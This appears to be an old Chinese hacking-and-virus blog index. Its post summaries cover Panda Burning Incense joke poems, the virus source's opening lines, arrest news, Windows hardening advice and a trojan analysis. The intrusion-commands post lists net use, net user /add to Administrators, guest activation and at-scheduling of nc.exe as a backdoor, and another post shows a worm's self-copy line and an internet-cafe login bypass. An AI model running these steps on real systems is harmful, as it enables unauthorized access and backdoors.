博文

[病毒]暴笑诗——之熊猫烧香(转)(2007-03-17 21:51:00)

摘要:
熊猫烧不尽,关机开又生! 

宝剑锋自磨砺出,熊猫香自网上来。 

无边香火烧烧下,不尽熊猫滚滚来 

身心俱疲终不悔,为猫消得人憔悴 

千呼万唤使出来,害我想砍熊猫刀!!! 

相见时难杀亦难,熊猫烧香百机残 

熊猫逊雪三分白,雪却输猫一炷香 
 
天长地久有时尽,此香绵绵无绝期 

猫儿香香烧九州,几家欢乐几家愁。

唯有烧香多放肆,敢教病毒换新鲜。 

梨花院落溶溶月.天榭楼台烧烧香. 

朝辞木马卡巴间,千里熊猫一刻来. 
两岸烧香停不住,病毒已染万重山. 

黑夜给我黑色的熊猫 我却用它来烧香 

一提熊猫泪千行,咋知何日不烧香。 

天涯何处无熊猫,何必单恋三枝香。 

熊猫未死香不尽,杀毒正扫泪怎干? 

路逢熊猫须当避,不是高手莫修机。 

只因世上多熊猫,才有人间百毒生。 

熊猫一个能毁机,杀毒一堆也关闭。

梦里寻猫千百度,蓦然回首已在香火栅栏处.

冬眠不觉晓,病毒卡巴绞, 
熊猫夜烧香,文件毁多少?

满机熊猫关不住,三支高香出墙来。

年年岁岁猫相似,岁岁年年香不同

熊猫离家带香回,毒性无改势未衰。 
卡巴相见不相识,笑问猫从何处来?

劝君更烧一炷香,系统恢复无镜像

熊猫铲尽根除日,家祭毋忘告乃机

这世界不缺少熊猫 只是缺少一台让他烧香的电脑

水火刀兵无妄灾,熊猫烧香也自然

烧香时难灭亦难,杀软无力电脑残
......

阅读全文(3605) | 评论:0

[病毒]熊猫烧香源代码(转)(2007-02-28 14:24:00)

摘要:program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432;             //病毒体的大小
IconOffset = $12EB8;           //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
 
{
HeaderSize = 38912;             //Upx压缩过病毒体的大小
IconOffset = $92BC;             //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize   = $2E8;             //PE文件主图标的大小--744字节
IconTail   = IconOffset + IconSi......

阅读全文(4770) | 评论:8

[病毒]深度报道熊猫烧香:武汉新洲中专生求职受挫报复作案(转)(2007-02-14 10:37:00)

摘要:   ●嫌疑人李俊系武汉新洲一中专毕业生 ●伙同5名同伙售卖病毒,已获利10万余元   荆楚网(楚天都市报)(记者吴昌华刘长风李波涛) 省公安厅昨日宣布,肆虐互联网的“熊猫烧香”电脑病毒大案告破,该病毒的原始制作者李俊及另5名嫌疑人落网。这是我国破获的国内首例制作计算机病毒的大案。   去年10月下旬以来,一种被命名为“熊猫烧香”的病毒在互联网上肆虐,该病毒通过多种方式传播,并将感染的所有程序文件改成熊猫举着3根香的模样。截至今年1月中旬,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。反病毒专家发现,病毒作者在病毒中加入代码“WHBOY”(武汉男孩),纷纷猜测病毒作者可能来自武汉。   今年1月22日,位于仙桃市的“江汉热线”网站因感染“熊猫烧香”病毒完全瘫痪,仙桃市网监立案侦查,省公安厅网监总队徐云峰博士参与破案。网警运用多种网络技术手段和侦查手段,终于查明制作“熊猫烧香”病毒的嫌疑人果然是“武汉男孩”——25岁的李俊。   2月3日,网警在武汉关山一出租屋,将刚从外面回来的李俊抓获,同时抓获另一涉案人员雷磊。经查,李俊,男,25岁,武汉新洲阳逻人;雷磊,男,25岁,李俊的同乡兼同学。两人中专毕业后一起参加网络技术职业培训班。2004年毕业后,李俊曾多次到北京、广州找IT方面的工作,但均未成功。为发泄心中不满,他开始尝试编写电脑病毒。通过编写“熊猫烧香”,李俊等人非法获利10万余元。   此后,网警将改装、传播“熊猫烧香”病毒的另4名嫌疑人抓获。目前,这6人均已被刑事拘留。   据警方介绍,李俊已供述了如何杀死熊猫烧香病毒的方法。   【相关报道】国内制作计算机病毒“熊猫烧香”案侦破   记者吴昌华 刘长风 李波涛 通讯员公宣   曾几何时,一只颔首敬香的熊猫成为无数电脑用户噩梦般的记忆:上百万个人用户、网吧及企业局域网用户遭受感染和破坏,损失难以估量,《瑞星2006安全报告》将其列为十大病毒之首,《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》称其为“毒王”。湖北省公安厅12日宣布:根据统一部署,湖北网监在浙、鲁、桂、津、粤、川、闽、云、新、豫等地警方的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获李俊等6名嫌犯。这是我国破获的国内首例制作计算机病毒的大案。   关山出租屋内抓获“武汉男孩”  ......

阅读全文(3328) | 评论:0

[新闻]湖北黑客攻破腾讯网站 涉嫌犯罪被警方抓获(转)(2006-12-26 00:01:00)

摘要:昨日记者获悉,天门市警方近日成功破获“黑客”攻击腾讯公司案,天门籍犯罪嫌疑人鄢某被成功抓获。   前不久,天门市公安局网监大队接到报案,腾讯公司(网络即时通讯工具QQ的运营公司)称近期发现公司内部OA管理系统、客服系统、虚拟币卡管理系统、游戏后台管理系统等约八十个系统被人非法入侵,内部13台服务器还被设置木马病毒,该公司计算机信息系统被严重破坏。   随后,天门网警从多个方面开展工作,并迅速查实,该攻击来自天门市互联网上网用户。网警充分利用先进的侦查技术手段,查找犯罪嫌疑人的蛛丝马迹和作案证据。8月8日晚,天门市干驿镇鄢某再次上网作案时,被警方当场抓获。   经审讯,今年7月份以来,鄢某利用自己发现的腾讯的系统漏洞,非法侵入该公司的计算机信息系统,并通过数据流侦听的方式,逐步取得公司域密码及其他重要资料,进而取得多台服务器及PC机的控制权限,以及OA管理系统、客服系统、虚拟币卡管理系统、游戏后台管理系统等多个系统数据库的超级用户权限,在13台服务器中植入木马程序,并利用所获得的数据库管理权限,先后修改多个用户号码的密码及密码保护资料,窃取了价值较大的网络虚拟财产。   鄢某同时将其入侵的过程完整地进行记录,通过打电话和发短信的方式向腾讯公司及其总裁进行敲诈勒索。   警方介绍,根据《刑法》相关规定,鄢某涉嫌构成破坏计算机信息系统罪被刑事拘留。目前,案件还在进一步审理中. PS:高手!高高手!!!!!!!......

阅读全文(3618) | 评论:1

[黑客]IPC$入侵详细解释(转)(2006-11-19 23:22:00)

摘要:  一般入侵首先是对目标主机进行端口扫描(portscan),建立在开放端口(服务)上的攻击是非常有效的。而通过共享入侵是网络中最最常见也是最基础的攻击方法。很多的网络安全初学者都是由这里开始的。 1 共享必须接触到的知识:
  SMB {Server Message Block) Windows协议族用于文件打印共享的服务。
  NBT {NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
  在Windows NT(windows 9x)以下版本中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT的实现,还有直接通过445端口实现。当Win2000(允许NBT)作为顾客来连接SMB服务器时,它会同时尝试连接139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,以455端口通讯来继续.当445端口无响应时,才使用139端口;当Win2000(禁止NBT)作为顾客来连接SMB服务器时,那么它只会尝试连接445端口,如果无响应,那么连接失败。
  如果win2000服务器允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放。如果 NBT 被禁止, 那么只有445端口开放.根据以上特点,当我们对目标主机进行portscan时,如果目标主机开放139,445端口,则基本上可以判断目标主机操作系统为windows NT/2K/XP,若只开放139端口,则目标主机操作系统有可能为windows 9x。但要注意:提供SAMBA服务的linux和UNIX操作系统的139端口也是开放的,用来提供类似windows的文件共享。   扫描到了开放139端口的windows系统,我们就能用BTSTAT命令来查询有关NetBIOS的信息。命令为:
nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S
] [-s] [interval]
解释:
  -a 列出给定主机名的远程计算机的名字表(name table) ......

阅读全文(9710) | 评论:2

[黑客]一般入侵所需要的几个常用命令(转)(2006-11-16 12:09:00)

摘要:1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。 net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina net命令果然强大啊! 2:at 一般一个入侵者入侵后都会留下后门,也就是木马种了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\127.0.0.1 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\127.0.0.1 12:3 nc.exe 这里......

阅读全文(3566) | 评论:4

[漏洞]利用智能ABC漏洞网吧免费上(转)(2006-11-16 12:05:00)

摘要:  在任何可以输入智能ABC的情况 输入V 然后输入向上键 在输入DEL 在回车就会关闭该程序. 这样的话我们就可以利用他破解网吧登陆系统了 哈哈,这招爽把。。  照上面的做确实会关闭该程序,在自己电脑上实验过,不过没去网吧试过,估计也行......

阅读全文(3618) | 评论:0

[系统服务]Windows Server十大隐患服务(转)(2006-10-31 20:20:00)

摘要:                   Windows Server十大隐患服务   普通用户常用Windows 2000 Server来架设个人服务器,然而在系统运行时自动启动的服务中,有些是系统运行所必需的,有些是可以停用或禁用的。同时,很多服务还存在一些安全隐患,我们必须将这些危险服务关闭。看来,随随便便地享受“服务”也会给我们带来安全隐患。今天就让我们来了解一下个人服务器架设者们需要更改或慎用的十大服务。

   提示:系统为Windows 2000 Pro的用户同样可以通过本文了解自己的系统中的服务。由于该系统是针对家庭个人用户的,它所提供的网络方面的管理工具并不完善,所以,对于想架设个人服务器的普通用户来说,还是应该采用Windows 2000 Server。

Messenger

危害种类:信息骚扰

危害系数:★★★

这是发送和接收系统管理员或“警报器”服务消息的服务。

自微软公司于90年代中期推出32位操作系统以来,该服务就一直是Windows操作系统中不可缺少的一部分。

现在,很多垃圾邮件发送者都利用这一功能向计算机用户发送垃圾信息,建议大家禁用该服务。

Remote Registry Service

危害种类:恶意攻击

危害系数:★★★★

该服务允许远程用户通过简单的连接就能修改本地计算机上的注册表设置。

   知道管理员账号和密码的人远程访问注册表是很容易的。打开注册表编辑器,选择“文件”菜单中的“连接网络注册表”选项,在“选择计算机”对话框里的“输入要选择的对象名称”下的输入框中输入对方的IP地址,点击“确定”按钮便会出现一个“输入网络密码”对话框,输入管理员账号和密码,点击“确定”按钮后就可对目标机器的注册表进行修改了。

现在,不少木马后门程序可以通过此服务来修改目标机器的注册表,强烈建议大家禁用该项服务。
......

阅读全文(3913) | 评论:0

[VB+病毒技术]全面了解蠕虫病毒加示例演示(转)(2006-09-20 01:37:00)

摘要: 全面了解蠕虫病毒 文章出处:小凤居-黑客行        如今对大家的电脑威胁最大的就属网络蠕虫病毒了!网络蠕虫病毒的危害之大简直令人吃惊,从大名鼎鼎的“爱虫”到“欢乐时光”,再到“红色代码”,其破坏力越来越强,因此我们有必要了解网络蠕虫病毒。

  蠕虫病毒与一般的计算机病毒不同,它不采用将自身拷贝附加到其他程序中的方式来复制自己,所以在病毒中它也算是一个“另类”。蠕虫病毒的破坏性很强,部分蠕虫病毒不仅可以在因特网上兴风作浪,局域网也成了它们“施展身手”的舞台――蠕虫病毒可以潜伏在基于客户机/服务机模式的局域网的服务机上的软件内,当客户机访问服务机,并对有毒的软件实施下载后,病毒就神不知、鬼不觉地从服务机上“拷贝”到客户机上了。

  其实脚本病毒是很容易制造的,它们都利用了视窗系统的开放性的特点。特别是COM到COM+的组件编程思路,一个脚本程序能调用功能更大的组件来完成自己的功能。以VB脚本病毒(如欢乐时光、 I Love You 、库尔尼科娃病毒、Homepage病毒等)为例,他们都是把.vbs脚本文件添在附件中,最后使用*.htm.vbs等欺骗性的文件名。下面我们详细了解一下蠕虫病毒的几大特性,从中找到对付蠕虫病毒的方法。

一、蠕虫病毒具有自我复制能力

  我们以普通的VB脚本为例来看看:

Set objFs=CreateObject (“Scripting.FileSystemObject”)
?创建一个文件系统对象
objFs.CreateTextFile ("C:\virus.txt", 1)
?通过文件系统对象的方法创建了一个TXT文件。

  如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘中创建一个TXT文件了。倘若我们把第二句改为:

objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")

  就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文......

阅读全文(4644) | 评论:1

[病毒资料之八]NTdHcP.exe进程病毒(2006-08-16 00:26:00)

摘要: 病毒资料:W32/QQRob.BK!pws 基本信息 病毒名称: W32/QQRob.BK!pws 类型: 木马 长度: 26275 威胁级别: 2 捕获日期: 2006-02-10 其它别名: Trojan-PSW.Win32.QQRob.cb,PWS-QQRob trojan 影响系统: MS-Windows 表现特征 1. %SYSTEM% 目录下存在文件 NTdHcP.exe;
2. QQ 的帐号和密码可能被他人盗用;
3. 某些杀毒软件不能正常运行。 行为分析 1. 这是一个 PE 病毒,使用加壳工具 nSPack 加密,加密后长度为 26,275 字节,其中包含 163 字节的
   附加数据;

2. 试图隐藏自身进程;

3. 拷贝自身到 %SYSTEM%\NTdHcP.exe,添加“隐藏”,“系统”和“只读”属性并执行,再删除自身;

4. 关闭下列窗口:

       LanCardS
       還原精靈
       还原精灵
       還原精靈 DEMO
       还原精灵 DEMO
       還原精靈21st
       还原精灵21st
       ......

阅读全文(5884) | 评论:1